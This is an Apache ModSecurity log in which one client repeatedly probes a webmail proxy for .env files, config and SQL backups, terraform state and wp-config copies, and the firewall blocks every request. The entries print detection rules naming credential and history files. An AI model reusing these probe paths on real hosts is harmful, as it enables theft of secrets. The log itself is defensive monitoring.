[Tue May 26 13:32:26.170424 2026] [security2:error] [pid 512745:tid 512967] [client 45.148.10.95:7732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/production/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5pwAAAWY"]
[Tue May 26 13:32:26.194375 2026] [security2:error] [pid 512745:tid 512982] [client 45.148.10.95:7682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/project/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5qQAAAXU"]
[Tue May 26 13:32:26.201531 2026] [security2:error] [pid 512745:tid 512977] [client 45.148.10.95:7668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5qwAAAXA"]
[Tue May 26 13:32:26.201840 2026] [security2:error] [pid 512745:tid 512877] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public-api/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5rAAAAQw"]
[Tue May 26 13:32:26.209099 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:7718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVTknKSB_s2CvZg7xN5rQAAATM"]
[Tue May 26 13:32:26.222716 2026] [security2:error] [pid 512745:tid 512938] [client 45.148.10.95:7636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public_html/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5rgAAAUk"]
[Tue May 26 13:32:26.250831 2026] [security2:error] [pid 512745:tid 512924] [client 45.148.10.95:7564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/qa/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5sAAAATs"]
[Tue May 26 13:32:26.333836 2026] [security2:error] [pid 512745:tid 512876] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5iQAAAQs"]
[Tue May 26 13:32:26.524013 2026] [security2:error] [pid 512745:tid 512891] [client 45.148.10.95:7698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/s3/.env.bak"] [unique_id "ahVTknKSB_s2CvZg7xN5ygAAARo"]
[Tue May 26 13:32:26.646156 2026] [security2:error] [pid 512745:tid 512971] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/api/.env"] [unique_id "ahVTknKSB_s2CvZg7xN50wAAAWo"]
[Tue May 26 13:32:26.652848 2026] [security2:error] [pid 512745:tid 512963] [client 185.191.171.3:19796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVTknKSB_s2CvZg7xN51QAAAWI"]
[Tue May 26 13:32:26.652988 2026] [security2:error] [pid 512745:tid 512963] [client 185.191.171.3:19796] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVTknKSB_s2CvZg7xN51QAAAWI"]
[Tue May 26 13:32:26.659441 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/backend/.env"] [unique_id "ahVTknKSB_s2CvZg7xN51gAAAVI"]
[Tue May 26 13:32:26.661725 2026] [security2:error] [pid 512344:tid 512582] [client 45.148.10.95:7632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/.env"] [unique_id "ahVTksbElyei4S77DQcONAAAAGw"]
[Tue May 26 13:32:26.767483 2026] [security2:error] [pid 512745:tid 512882] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/service/.env"] [unique_id "ahVTknKSB_s2CvZg7xN53wAAARE"]
[Tue May 26 13:32:26.772863 2026] [security2:error] [pid 512344:tid 512554] [client 45.148.10.95:7550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/services/.env"] [unique_id "ahVTksbElyei4S77DQcOPQAAAFA"]
[Tue May 26 13:32:26.823979 2026] [security2:error] [pid 512344:tid 512506] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/shared/.env"] [unique_id "ahVTksbElyei4S77DQcOPwAAACA"]
[Tue May 26 13:32:26.840590 2026] [security2:error] [pid 512745:tid 512939] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/shop/.env"] [unique_id "ahVTknKSB_s2CvZg7xN55QAAAUo"]
[Tue May 26 13:32:26.892643 2026] [security2:error] [pid 512745:tid 512934] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/src/.env"] [unique_id "ahVTknKSB_s2CvZg7xN56gAAAUU"]
[Tue May 26 13:32:26.999713 2026] [security2:error] [pid 512745:tid 512955] [client 45.148.10.95:7652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/srv/.env"] [unique_id "ahVTknKSB_s2CvZg7xN59wAAAVo"]
[Tue May 26 13:32:27.014274 2026] [security2:error] [pid 512745:tid 512886] [client 45.148.10.95:7740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stage/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5-AAAARU"]
[Tue May 26 13:32:27.023204 2026] [security2:error] [pid 512745:tid 512964] [client 45.148.10.95:7682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/staging/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5-gAAAWM"]
[Tue May 26 13:32:27.057559 2026] [security2:error] [pid 512745:tid 512932] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stg/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5_AAAAUM"]
[Tue May 26 13:32:27.123131 2026] [security2:error] [pid 512745:tid 512926] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stripe/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6AQAAAT0"]
[Tue May 26 13:32:27.180350 2026] [security2:error] [pid 512745:tid 512935] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/terraform.tfstate.backup"] [unique_id "ahVTk3KSB_s2CvZg7xN6BwAAAUY"]
[Tue May 26 13:32:27.213172 2026] [security2:error] [pid 512344:tid 512475] [client 45.148.10.95:7632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVTk8bElyei4S77DQcOTQAAAAE"]
[Tue May 26 13:32:27.226057 2026] [security2:error] [pid 512745:tid 512961] [client 45.148.10.95:7636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/test/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6DAAAAWA"]
[Tue May 26 13:32:27.276728 2026] [security2:error] [pid 512745:tid 512902] [client 45.148.10.95:7652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/user/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6FAAAASU"]
[Tue May 26 13:32:27.294017 2026] [security2:error] [pid 512745:tid 512910] [client 45.148.10.95:7732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v1/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6FgAAAS0"]
[Tue May 26 13:32:27.297525 2026] [security2:error] [pid 512745:tid 512951] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v2/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6GAAAAVY"]
[Tue May 26 13:32:27.310865 2026] [security2:error] [pid 512745:tid 512950] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v3/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6GgAAAVU"]
[Tue May 26 13:32:27.454356 2026] [security2:error] [pid 512745:tid 512878] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/var/www/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6KAAAAQ0"]
[Tue May 26 13:32:27.461360 2026] [security2:error] [pid 512344:tid 512499] [client 45.148.10.95:7446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/var/www/html/.env"] [unique_id "ahVTk8bElyei4S77DQcOWAAAABk"]
[Tue May 26 13:32:27.492043 2026] [security2:error] [pid 512745:tid 512995] [client 45.148.10.95:7800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/web/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6KgAAAYI"]
[Tue May 26 13:32:27.608843 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/website/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6OAAAATk"]
[Tue May 26 13:32:27.623481 2026] [security2:error] [pid 512745:tid 512991] [client 45.148.10.95:7800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVTk3KSB_s2CvZg7xN6OgAAAX4"]
[Tue May 26 13:32:27.630293 2026] [security2:error] [pid 512745:tid 512909] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVTk3KSB_s2CvZg7xN6PAAAASw"]
[Tue May 26 13:32:27.652781 2026] [security2:error] [pid 512745:tid 512963] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVTk3KSB_s2CvZg7xN6PgAAAWI"]
[Tue May 26 13:32:27.664834 2026] [security2:error] [pid 512745:tid 512890] [client 45.148.10.95:7698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVTk3KSB_s2CvZg7xN6PwAAARk"]
[Tue May 26 13:32:27.681241 2026] [security2:error] [pid 512745:tid 512907] [client 159.148.158.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVTknKSB_s2CvZg7xN59AAAASo"]
[Tue May 26 13:32:27.689507 2026] [security2:error] [pid 512344:tid 512512] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/wp-content/mysql.sql"] [unique_id "ahVTk8bElyei4S77DQcOXQAAACY"]
